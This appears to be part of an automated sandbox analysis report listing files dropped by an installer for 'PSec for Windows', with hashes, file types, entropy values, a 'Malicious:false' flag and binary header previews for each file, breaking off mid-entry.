                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):709120
                              Entropy (8bit):5.992581602394087
                              Encrypted:false
                              SSDEEP:12288:8myV/tTB9ef3BvRy9NNPI0+DCksfBzu9KRAAJ3jqG3nSgrfhbeqLf:vyFt3efBvRy9NNPItCkGuqLRjx3nSgLN
                              MD5:B0027D5280E1D7EFFC0B9A1E94A6F94C
                              SHA1:6762909AEA5F77A0F7818DFA1BB0E2208732BAFD
                              SHA-256:E06519F29B149D64D534A19FA1F6A31066F4B68FB700CEDB4FB0A9921D79EBBD
                              SHA-512:04EC97501B91D342DCEF34C9AD3ABEEB477B72ADEFA574F10650E886EC011120BE7C5574EF02489FD3CE0F51FE6F2DE0D9AE6FD83A3FBB077DC0985A920755AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...!...J...2...J...J...L...!...J...!...J...!...J...!...J...!...J...!}..J...!...J...!...J..Rich.J..................PE..L.....c............!................pw.............P.........................0............@A........................P...:....G..`................................a......T............................................@..........@....................text............................... ..`.data....*..........................@....idata...C...@...D..................@..@.didat..d............X..............@....rsrc................\..............@..@.reloc...a.......b...p..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):100352
                              Entropy (8bit):6.268429975218522
                              Encrypted:false
                              SSDEEP:1536:thDj/y2ObZIxMoYye97D4nWkbT5+yYWZO6T5rEBzEzw/QGowH/OmGr:vDjrOYjeFD4nWm5+yjT6dNYUOZ
                              MD5:86AB2A500D974CBBC20EE7FA1F408CEC
                              SHA1:E540DC889F98CC042A53FE67F0D935C675A55D4F
                              SHA-256:6F055C097B986ACDEC861247120C8281C7C67FF5BED40F58E2E921F70E5C6E7A
                              SHA-512:4E7F6D2BEE39D52F4961DD503EE7F7429020EE4AEAF89B0FC18BD7F6615568DAA656A12B1CDED4893452A40C392D196CF3894E0DA8CC0BAD90F9B5DDB767B593
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2..ea..ea..ea...a..ea..f`..ea..a`..ea..da%.ea..d`..ea..e`..ea..l`..ea..``..ea...a..ea..g`..eaRich..ea........PE..L.....dp...........!.....(..........0$.......@......................................&.....@A.........................3..x...hr.......................................7..T...........................(................p..d....0.......................text...(&.......(.................. ..`.data....'...@.......,..............@....idata.......p......................@..@.didat..P............D..............@....rsrc............0...F..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):4056240
                              Entropy (8bit):7.97002360834342
                              Encrypted:false
                              SSDEEP:98304:QsSoMQnPLeMNCvYa59QKS7XnqSsAVlsX4pIDmjjcrhm2NGbUU:QsSByeMj04VlslQsm2NK
                              MD5:01EF58E7C144C701B2EA01CFC049DBE4
                              SHA1:2F572ACCB519096C9EA805812BA53703C16CCEEA
                              SHA-256:AE5B66322E5A7C26AD21CCC556BDC1618796166565D2939142C5AA3D76C38ACE
                              SHA-512:434FD6D4EB49669617DA3A15C2239A2CF524624CC4FCF9F09D8BB78A40DDF2DC5E70105E6708CE7643448F3176301EDD64A9B71244C179A836119532D7DD69A6
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... .......L>...@..........................................P..X...........(.=..)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):183296
                              Entropy (8bit):6.493584105087857
                              Encrypted:false
                              SSDEEP:3072:0uv++PiLzpzMdxVP38TyqaOVhWedhOC3Vn4fry43/N:0YfPkpzM9PSzWeWCln8j
                              MD5:064C2ABC579277DD94259D5F985C4FD4
                              SHA1:75BD2A45E9FB320A303FCD81E894D96EDAF7CBCB
                              SHA-256:449F0431E5C6FAE736A2E367818813F279B41BA32A3979EE6D1359EC4DFC3BFE
                              SHA-512:7D62A88437662EF9A3D5D552E43D5B8A1641FFF8ACF70B327CA7D18EA806298E38E8B4B4BBA0C1697D9B74A14C23D74E49914CDC656061E01F95C3FB737C27FD
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H.&...&...&.......&...%...&..."...&...'..&...'...&...#...&...&...&.../...&......&...$...&.Rich..&.........PE..L....{.............!.........H......0A...................................................@A................................t...................................l)...?..T...................t...........................p............................text............................... ..`.data...D...........................@....idata..>...........................@..@.rsrc...............................@..@.reloc..l).......*..................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):47104
                              Entropy (8bit):6.2437778672689985
                              Encrypted:false
                              SSDEEP:768:A686/iNXC+tFbpTSRkg3AAdYn7AJUeuFRseJgvDwzcQx8Z499:Av6/iNXXDuX7meUeuFKrvcJaZ49
                              MD5:7801A2F01B7F0163DA0088B1E666A573
                              SHA1:C4D91352CFA440C2EC7018A412B8C3DABC0DC905
                              SHA-256:62B4D125AE01FD97C91AFC55238E15D643CC4DB92F990D9D5C40C0C62FA270F3
                              SHA-512:992CA7A0E75E7AC64AA43040C98A32C50566376F754B8EEA08993F235D816DDF6C9A97FB221C01230C26AF6ACC3113DC7C0541FBE011BCA1A947F32BCA93ABEE
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.2.g.\.g.\.g.\.n...K.\.s.X.q.\.s.Y.b.\.s._.d.\.s.].r.\.g.]..\.s.T.s.\.s..f.\.s.^.f.\.Richg.\.........................PE..L...M........................:...... .............@.................................K.....@...... ......................................x............................#..T...............................................|............................text............................... ..`.data...$...........................@....idata..8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):46080
                              Entropy (8bit):5.996220242040934
                              Encrypted:false
                              SSDEEP:768:NXfEQgbKXSjjj/fAU7kpcyiPhZkbzKKkv6H+WnfFV6gWpMUt56Xf5rvZ/qWyIV6H:WVz/vOOsRzUyRR/q2upZm48
                              MD5:539063395EFBB5480C0AC13CC9E5FB16
                              SHA1:772038B6EDE76831AC02444CCD826089283FE0C0
                              SHA-256:18F9DF881FFEB43EBF558CB5BFC2B40BB64E54A2DEE391B79CEBB10173FB41EB
                              SHA-512:7D4CBE926EA364DAFCB7283AC78658ADC0DEE14BF41F1CD584975EA206C90511B155266B554D96175C24B3758DDFB40226BDB53C6EC9BACAC84C654C0A854550
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.).s..e...p..e...h..e...v..e...h..q..q..e...z..e.E.p..e...p..Richq..........PE..L.....K..................|...8......pu............@.................................v.....@...... ..........................4...........h............................$..T...............................................0............................text....{.......|.................. ..`.data...,...........................@....idata..j...........................@..@.rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):108544
                              Entropy (8bit):6.242701983451339
                              Encrypted:false
                              SSDEEP:1536:YFQ53HD5Wp6WgjJqie+qR5i29VLlsB32YUwAtF0MBJbTmXJ:I43D7ci2LXL6B32YUwO0MLbTmX
                              MD5:7AB4616DE5856615CA9E0D1FCD01FAD0
                              SHA1:36AA0E0F0547AA1B64EC8B2A95EC93518A766163
                              SHA-256:A0CE5F7D716E881A596332D7ECDC0BC8AAA89FDE9D1BF1B78F3152A3920CD987
                              SHA-512:438EB34699F339AB3C11861BB9B86DCBDBA0C604E43240CD433C7DE3814F1C36D61C54900F034CCBE62B30D419C61A78567E33761A99E42CFC50724CD0F9CE1C
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y8...k...k...k..k...k..j...k..j...k...k^..k..j...k..j...k..j...k..j...k..k...k..j...kRich...k........................PE..L...D..............!.....B...f......@=.......`............................................@A.........................P.......q...........2..........................@P..T............................,...............p.......K.......................text...OA.......B.................. ..`.data... ....`.......F..............@....idata.......p.......H..............@..@.didat...............V..............@....rsrc....2.......4...X..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.916839934179735
                              Encrypted:false
                              SSDEEP:768:VP+MF9uXFkzxt8xJ0ltub+aTOV6GndP4Nm5f:VNumn8xJga294Ny
                              MD5:83D97778953F5A1A93EA93E644273DC7
                              SHA1:2E86AF4B2BA1D5F5B94B331218B46C6EC9504AE3
                              SHA-256:26A413AB3FDA517896723362E32BCF91EE421D35AA72F5059CF652BB05173F32
                              SHA-512:57E46B3F78887B37480AA041E09B3E08BA4ABD42600B7EE12FE77F2222452431466759BB4F3577C3FB6BF816530C227CFBAADBDB7ADC8C145468B38A7304591F
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!..O...O...O...N...O......O...N...O...L...O...K...O...O...O...B...O...J...O.......O.......O...M...O.Rich..O.........................PE..L....zZh...........!.....n...$.......(..............................................[_....@A.........................u..F...\...................................D.......T...............................................X...\p.......................text...6l.......n.................. ..`.data................r..............@....idata...............t..............@..@.didat..............................@....rsrc...............................@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):2560
                              Entropy (8bit):2.903432271168218
                              Encrypted:false
                              SSDEEP:24:eH1GS8WGJb3MxCMD5uIZW0THWokPINug9hv35WWdPPYPNyBx8:yaf2cIZWwHbuwh/5WwHgcx
                              MD5:79A58206AB9628B34FC7C38C81B68F14
                              SHA1:CDB5501DABAADD95486EB4D970C6E0608D6E2587
                              SHA-256:44A05AF87399C3B1F010DD7B07ADD2F6FE5C31780C47FC96055AE48651213ECB
                              SHA-512:35328F18C7E9F9DA652B8C5056653B7B188003007BA2426503FB00FCB49C5DF2E3288F4D028FE1784950590C9F26AC58E5794A98C5755DDA632B0DAEECCFBF73
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...([.w...........!.........................................................0............@.......................................... ..X...............................8............................................................................text...............................@..@.rsrc...X.... ......................@..@....([.w........T...8...8.......([.w........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....&.jV.^JQ.fXEY..8.J..+./is.([.w........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\unins000.dat

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:InnoSetup Log PSec for Windows, version 0x418, 19393 bytes, 061544\37\user\376, C:\Users\user\AppData\Roaming\PSecWin\376
                              Category:dropped
                              Size (bytes):19393
                              Entropy (8bit):3.8169817942792337
                              Encrypted:false
                              SSDEEP:192:r1ConPjXID+4Yu1A1aJ4RCBdYCUyObP4DSmr7kLWGHL:rjnOYu1A164CUyObPIr7JGHL
                              MD5:8FA1CE1F4D57DA53822DA11FBD71A8F9
                              SHA1:E3D534D6D1DFB4F0F056120858936C4A1E4450F2
                              SHA-256:E919E0DBEE0C33E8C87749A48AD3EB96F9524E1E501D7987C38BE1285890B92A
                              SHA-512:1A37F716F4DAE5F71417C1699F2430C6779F60F7BB538A6E8B30C25978478F795BC9D72E46AED45C2A730CCDA8A7BB3D16C9F2CAC594203A1B7ED38F12833525
                              Malicious:false
                              Preview:Inno Setup Uninstall Log (b)....................................PSec for Windows................................................................................................................PSec for Windows....................................................................................................................5....K...................................................................................................................ek.........OU.&...............0.6.1.5.4.4......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.S.e.c.W.i.n..................-.... ......-...6...IFPS....'... ....................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM....................F....IDISPATCH.............!OPENAR

                              C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3244605
                              Entropy (8bit):6.3002173620753625
                              Encrypted:false
                              SSDEEP:49152:2dx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgx:XHDYsqiPRhINnq95FoHVBy333C0
                              MD5:83B9079153811D0B853865E88245FBE4
                              SHA1:AEF31BEF95CB3B0126F7981837D53932CBBF4C1E
                              SHA-256:5AECCD5D782A518E35FA5227893C982AD69A5DD87F5D683E036DB34E05B471F1
                              SHA-512:58ECDD1CCD28020DBA7596E52DCC37B77896A807F2B69183A3B0E71B03E7C44187CEE5034F9B5E9474308D7C35D5EF47A0E2ED5FAE3FA446D51CC48D9C089D5C
                              Malicious:false
                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................

                              C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):360144
                              Entropy (8bit):5.661023715516949
                              Encrypted:false
                              SSDEEP:3072:jCuEydZX7mwKR4L5QprdZvh+h9H7WwfNfZ/CTla1nSrm9W0fQx78qYFQxV3Zsd8+:9EYZXqwKR4lQpr/GDCk3fQxUt9+C
                              MD5:B08196E5863137C12CA5BF166F16AAC7
                              SHA1:A5EEDE1F86B4DBF8EB920FA4B74C03FFAA19847C
                              SHA-256:2379C89382789238DCAE1433C04EEB861A2AB72955EC67D7554F4889AF2788C3
                              SHA-512:ACAB6898ADB05CFD15A60B5248AD4E4C4763EB30BF32A872FE05E2FE29D663E37B7DFC812A5AA66D300AFF3178F045F10A3EA4231DD6B41BFC8BBDFDC6E7C3F4
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ F..A(..A(..A(..*+..A(..*)..A(..A).BA(..*,..A(..*(..A(..* ..A(..*...A(..**..A(.Rich.A(.................PE..L....C1............!.........t...............................................P............@A...........................B...h...(.......`............P....... ..L+...^..T...........................(...................`............................text............................... ..`.data.... .......\..................@....idata..8...........................@..@.rsrc...`...........................@..@.reloc..L+... ...,...$..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):67072
                              Entropy (8bit):6.314142155382167
                              Encrypted:false
                              SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                              MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                              SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                              SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                              SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..S..S..G...R..G...\..S.....G...@..G...Q..G...R..G...D..G.e.R..G...R..RichS..................PE..L.................!.........0.....................w.........................@............@A........................p...9...H........ ..P....................0..(....!..T........................... ...................D.......`....................text............................... ..`.data...............................@....idata..T...........................@..@.didat..(...........................@....rsrc...P.... ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):78336
                              Entropy (8bit):6.371751508872591
                              Encrypted:false
                              SSDEEP:1536:UbDMdx4Tm9lSD2HAcOqa57xlYuNxo8b1E:+MduTm9lSD7rNKk6
                              MD5:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                              SHA1:CD2F50FD5A7BD6291DE1948F100415044C767E63
                              SHA-256:3C928B9AFF2E651AA35EA798C29FDE398E9F7817E3451AE0F4C97C86630DC92B
                              SHA-512:84398D4E5680C2EA1679D0076468207A9503B053A233932FD3EFAEFDBF4559CFEAB5A0E95F526644C6382A88C17B6A62D3993323012211AB685DA4C4B025C045
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./.`k..3k..3k..3b.f3E..3...2j..3...2j..3...2...3k..3..3...2h..3...2H..3...3j..3...2j..3Richk..3........PE..L.....RR.....................6....................@..........................p......".....@...... ...........................!.......@..P....................P......P(..T............................................ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.didat.......0......................@....rsrc...P....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):4.139121993350808
                              Encrypted:false
                              SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                              MD5:E32319E5947A76F8E50EC50C37906882
                              SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                              SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                              SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L.................!..............................8N.........................0......z.....@E........................`...0............ .. ...............................T............................................................................text...<...........................@..@.rsrc... .... ......................@..@...............$..........................d..........................$..................................x.......................H...............>...i...............@...z...........=...v...............5...p...............I...x...............)...Z...............*...]..........."..._...............!...P...............2...g...................................................WS2HELP.dll.WahCloseApcHelper.ws2_32.WahCloseApcHelper.WahCloseHandleHelper.ws2_32.WahCloseHandleHelper.WahClose

                              C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.313827090823637
                              Encrypted:false
                              SSDEEP:768:hpT8dTrLIdc5DGhZgItQwWgGjG1al2YjZ/2:hpAdTrLIdc5DGhZgItTXGcaLjZ/2
                              MD5:2422934B02194D962E3891D91DFF50C8
                              SHA1:7E00DF40C44ABC1077424CAF084494507FFF726F
                              SHA-256:313B1EB5A6DE86E234FCB18A6AA4AE75FFECB9243BDEC7F34253A7FCC9F29FC0
                              SHA-512:6E1F4C7CFA87A4576A5F943AF5B84B9BEADE8FFEA36CB94A03461F338C36C6647D074DBA4B5E160D75018762E5448A193FE59E0D2662DC6FCD24FEDAB45AC256
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........sP.n...n...n.......n.......n.......n...n...n.......n.......n.......n.......n.......n..Rich.n..........PE..L...[..............!.....n...$.......m...............................................M....@A........................P{......D........................................0..T...........................(...................@............................text....l.......n.................. ..`.data...H............r..............@....idata...............t..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1831424
                              Entropy (8bit):6.562960863651942
                              Encrypted:false
                              SSDEEP:49152:wORUHXxYF3icgea4Zb8nlJq22qT1MTrQyEDAxq4:FR+XxYxhgvc2Dq22gmrNi
                              MD5:61393B3920D949B7A89D8D8623A65BD8
                              SHA1:539EF7897C1A642BAA9353E3B630D35DFC642F5F
                              SHA-256:C70DA787D2857BB08A49327CE75299B6440A75E70BEABC8EFDC4084B779454CE
                              SHA-512:870AD9D39053A6A833A8ECD6F94691CD68839A4C47444D46EDEE0544D58C581D6D1CB821F181F2F9CFAB45C4AECA60CDF8D0D62128E6481319B81724DC4B048D
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'_.]c>..c>..c>..jF..W>..wU..g>..wU..w>..c>...>..wU..j>..wU..W>..wU..b>..wU...>..wU~.b>..wU..b>..Richc>..........................PE..L...g.i...........!.....Z...........`.......p...............................@......._....@A.........................i..................P........................c...Y..T...................l{.......z.......................h..@....................text....Y.......Z.................. ..`.data........p.......^..............@....idata..p............r..............@..@.didat..............................@....rsrc...P...........................@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):98816
                              Entropy (8bit):6.316378030753595
                              Encrypted:false
                              SSDEEP:3072:Q7Gh7ckvMmmAhgZhaHydiPuC0Z7corN/RBPe:Q7Ehg/aHcXCG7corBK
                              MD5:652C03D08A2ABB6ADC51F081B4FA078E
                              SHA1:C75D8762FBF44E97AF4B6C8B68E18977B35264E9
                              SHA-256:33ECC20387B077231AA28A3F13A33FAF030721360E74FD551D71BD26FC30E424
                              SHA-512:3EABA26C7D9B1A58CCD1AF0361E273DC2827D1CF2147A7889642CB3D93071885F7A83DFCD1555CF5C5694E8B61CC7BD9D52270024820050CCD1E5223758301C6
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................................j............Rich............PE..L....T.............!.....(...Z......p........@......................................5.....@A........................P6..h...$R..........8 ...........................@..T............................................P.. ...`5.......................text....&.......(.................. ..`.data........@.......,..............@....idata.......P.......6..............@..@.didat.......p.......H..............@....rsrc...8 ......."...J..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................

                              C:\Windows\INF\c_display.PNF

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x15b8 "Signature", at 0x68 WinDirPath, LanguageID 809, at 0x80 language en-GB
                              Category:dropped
                              Size (bytes):8660
                              Entropy (8bit):3.3733007089209863
                              Encrypted:false
                              SSDEEP:96:66BcwTdCMNyLNfWdlapY4VfOrtlBARv7Li+XT7+uZt/Y0BnuOTITdE7VGpR2bQjN:67wQMYBfeaOBA9LjXvZ1NnuT6u
                              MD5:A35E461187397BC21D7B1FFBC425EB69
                              SHA1:1F8AF576F211C42C237324A7C04D5BE9DA89C39C
                              SHA-256:0474A97D51D62B4FE7BCBAEFBDE58C25590C088CC25C93735126F98039C2C0D5
                              SHA-512:1F37125FBBDB18D5088409AA083840C9EEFF4B9318466E7B6B2F54245FBB6FB24497E31369A7A112BD0B7FF8592E4B0551CF3F30EA7D99F969B2CB135BF13CD4
                              Malicious:false
                              Preview:..........................x................$...............H...................h................!......C.:.\.W.i.n.d.o.w.s.....e.n.-.G.B...........................................................D...................................................................................................h...........................0...........|...........<...........t.......(.......................$...................................................................................................................................................................p...........P............................... .......................................|...|...........................................................|...........,...............................................................................................................................................$...................p...................@...................................................................................................

                              C:\Windows\INF\oem4.inf

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Windows\INF\oem5.inf

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
